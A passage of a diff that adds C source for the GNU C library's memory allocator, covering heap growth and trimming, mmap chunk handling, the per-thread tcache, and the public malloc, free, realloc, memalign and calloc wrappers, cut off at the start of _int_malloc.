+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread char tcache_shutting_down = 0;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
+
+static void __attribute__ ((section ("__libc_thread_freeres_fn")))
+tcache_thread_freeres (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  tcache = NULL;
+
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+
+  tcache_shutting_down = 1;
+}
+text_set_element (__libc_thread_subfreeres, tcache_thread_freeres);
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+#define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else
+#define MAYBE_INIT_TCACHE()
+#endif
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes = request2size (bytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
+  /* chunk corresponding to oldmem */
+  const mchunkptr oldp = mem2chunk (oldmem);
+  /* its size */
+  const INTERNAL_SIZE_T oldsize = chunksize (oldp);
+
+  if (chunk_is_mmapped (oldp))
+    ar_ptr = NULL;
+  else
+    {
+      MAYBE_INIT_TCACHE ();
+      ar_ptr = arena_for_chunk (oldp);
+    }
+
+  /* Little security check which won't hurt performance: the allocator
+     never wrapps around at the end of the address space.  Therefore
+     we can exclude some size values which might appear here by
+     accident or by "design" from some intruder.  We need to bypass
+     this check for dumped fake mmap chunks from the old main arena
+     because the new malloc may provide additional alignment.  */
+  if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
+       || __builtin_expect (misaligned_chunk (oldp), 0))
+      && !DUMPED_MAIN_ARENA_CHUNK (oldp))
+    {
+      malloc_printerr (check_action, "realloc(): invalid pointer", oldmem,
+		       ar_ptr);
+      return NULL;
+    }
+
+  checked_request2size (bytes, nb);
+
+  if (chunk_is_mmapped (oldp))
+    {
+      /* If this is a faked mmapped chunk from the dumped main arena,
+	 always make a copy (and do not free the old chunk).  */
+      if (DUMPED_MAIN_ARENA_CHUNK (oldp))
+	{
+	  /* Must alloc, copy, free. */
+	  void *newmem = __libc_malloc (bytes);
+	  if (newmem == 0)
+	    return NULL;
+	  /* Copy as many bytes as are available from the old chunk
+	     and fit into the new size.  NB: The overhead for faked
+	     mmapped chunks is only SIZE_SZ, not 2 * SIZE_SZ as for
+	     regular mmapped chunks.  */
+	  if (bytes > oldsize - SIZE_SZ)
+	    bytes = oldsize - SIZE_SZ;
+	  memcpy (newmem, oldmem, bytes);
+	  return newmem;
+	}
+
+      void *newmem;
+
+#if HAVE_MREMAP
+      newp = mremap_chunk (oldp, nb);
+      if (newp)
+        return chunk2mem (newp);
+#endif
+      /* Note the extra SIZE_SZ overhead. */
+      if (oldsize - SIZE_SZ >= nb)
+        return oldmem;                         /* do nothing */
+
+      /* Must alloc, copy, free. */
+      newmem = __libc_malloc (bytes);
+      if (newmem == 0)
+        return 0;              /* propagate failure */
+
+      memcpy (newmem, oldmem, oldsize - 2 * SIZE_SZ);
+      munmap_chunk (oldp);
+      return newmem;
+    }
+
+  __libc_lock_lock (ar_ptr->mutex);
+
+  newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
+
+  __libc_lock_unlock (ar_ptr->mutex);
+  assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (newp)));
+
+  if (newp == NULL)
+    {
+      /* Try harder to allocate memory in other arenas.  */
+      LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
+      newp = __libc_malloc (bytes);
+      if (newp != NULL)
+        {
+          memcpy (newp, oldmem, oldsize - SIZE_SZ);
+          _int_free (ar_ptr, oldp, 0);
+        }
+    }
+
+  return newp;
+}
+libc_hidden_def (__libc_realloc)
+
+void *
+__libc_memalign (size_t alignment, size_t bytes)
+{
+  void *address = RETURN_ADDRESS (0);
+  return _mid_memalign (alignment, bytes, address);
+}
+
+static void *
+_mid_memalign (size_t alignment, size_t bytes, void *address)
+{
+  mstate ar_ptr;
+  void *p;
+
+  void *(*hook) (size_t, size_t, const void *) =
+    atomic_forced_read (__memalign_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(alignment, bytes, address);
+
+  /* If we need less alignment than we give anyway, just relay to malloc.  */
+  if (alignment <= MALLOC_ALIGNMENT)
+    return __libc_malloc (bytes);
+
+  /* Otherwise, ensure that it is at least a minimum chunk size */
+  if (alignment < MINSIZE)
+    alignment = MINSIZE;
+
+  /* If the alignment is greater than SIZE_MAX / 2 + 1 it cannot be a
+     power of 2 and will cause overflow in the check below.  */
+  if (alignment > SIZE_MAX / 2 + 1)
+    {
+      __set_errno (EINVAL);
+      return 0;
+    }
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - alignment - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+
+  /* Make sure alignment is power of 2.  */
+  if (!powerof2 (alignment))
+    {
+      size_t a = MALLOC_ALIGNMENT * 2;
+      while (a < alignment)
+        a <<= 1;
+      alignment = a;
+    }
+
+  arena_get (ar_ptr, bytes + alignment + MINSIZE);
+
+  p = _int_memalign (ar_ptr, alignment, bytes);
+  if (!p && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_memalign_retry, 2, bytes, alignment);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      p = _int_memalign (ar_ptr, alignment, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!p || chunk_is_mmapped (mem2chunk (p)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (p)));
+  return p;
+}
+/* For ISO C11.  */
+weak_alias (__libc_memalign, aligned_alloc)
+libc_hidden_def (__libc_memalign)
+
+void *
+__libc_valloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  return _mid_memalign (pagesize, bytes, address);
+}
+
+void *
+__libc_pvalloc (size_t bytes)
+{
+  if (__malloc_initialized < 0)
+    ptmalloc_init ();
+
+  void *address = RETURN_ADDRESS (0);
+  size_t pagesize = GLRO (dl_pagesize);
+  size_t rounded_bytes = ALIGN_UP (bytes, pagesize);
+
+  /* Check for overflow.  */
+  if (bytes > SIZE_MAX - 2 * pagesize - MINSIZE)
+    {
+      __set_errno (ENOMEM);
+      return 0;
+    }
+
+  return _mid_memalign (pagesize, rounded_bytes, address);
+}
+
+void *
+__libc_calloc (size_t n, size_t elem_size)
+{
+  mstate av;
+  mchunkptr oldtop, p;
+  INTERNAL_SIZE_T bytes, sz, csz, oldtopsize;
+  void *mem;
+  unsigned long clearsize;
+  unsigned long nclears;
+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  arena_get (av, sz);
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (mem == 0 && av != NULL)
+    {
+      LIBC_PROBE (memory_calloc_retry, 1, sz);
+      av = arena_get_retry (av, sz);
+      mem = _int_malloc (av, sz);
+    }
+
+  if (av != NULL)
+    __libc_lock_unlock (av->mutex);
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  const char *errstr = NULL;
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
